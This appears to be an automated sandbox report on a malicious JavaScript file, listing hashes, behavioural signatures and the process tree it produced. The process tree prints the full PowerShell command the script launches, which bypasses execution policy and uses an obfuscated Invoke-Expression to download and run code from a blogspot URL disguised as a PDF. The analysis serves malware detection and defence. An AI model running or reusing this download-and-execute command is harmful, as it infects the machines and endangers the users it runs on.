Analysis
-
max time kernel
121s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18-11-2024 02:44
Static task
static1
Behavioral task
behavioral1
Sample
cd4caace5e85b095654b499c34414a1d839ff30bf910993c3ebcdc1fbd9ff2bf.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
cd4caace5e85b095654b499c34414a1d839ff30bf910993c3ebcdc1fbd9ff2bf.js
Resource
win10v2004-20241007-en
General
-
Target
cd4caace5e85b095654b499c34414a1d839ff30bf910993c3ebcdc1fbd9ff2bf.js
-
Size
80KB
-
MD5
5eed57a36b459c29a10dbc8458493a26
-
SHA1
4be4299dc346dc3499adb4b01edd09b339d858a4
-
SHA256
cd4caace5e85b095654b499c34414a1d839ff30bf910993c3ebcdc1fbd9ff2bf
-
SHA512
59192b7d17198bf257fe8de35ce9523f61a7eb8495647a784f6b386dfbf60642c5109bc37bccb580e71047d556a5ebf86e7943efe57d9f06c4435e57846732d2
-
SSDEEP
768:rZQ0foU+Ui73GNNUZZQSYsVxU4Ua4UYdIMfVkArv6rAHcVxEBxVNoYdDBHBqabPg:oC1l2unjA06
Malware Config
Signatures
-
Deletes itself 1 IoCs
Processes:
wscript.exepid process 2524 wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2412 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2412 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
wscript.exedescription pid process target process PID 2524 wrote to memory of 2412 2524 wscript.exe powershell.exe PID 2524 wrote to memory of 2412 2524 wscript.exe powershell.exe PID 2524 wrote to memory of 2412 2524 wscript.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\cd4caace5e85b095654b499c34414a1d839ff30bf910993c3ebcdc1fbd9ff2bf.js1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://11-14hotelmain.blogspot.com///////chutmarao.pdf);Start-Sleep -Seconds 3;2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2412
-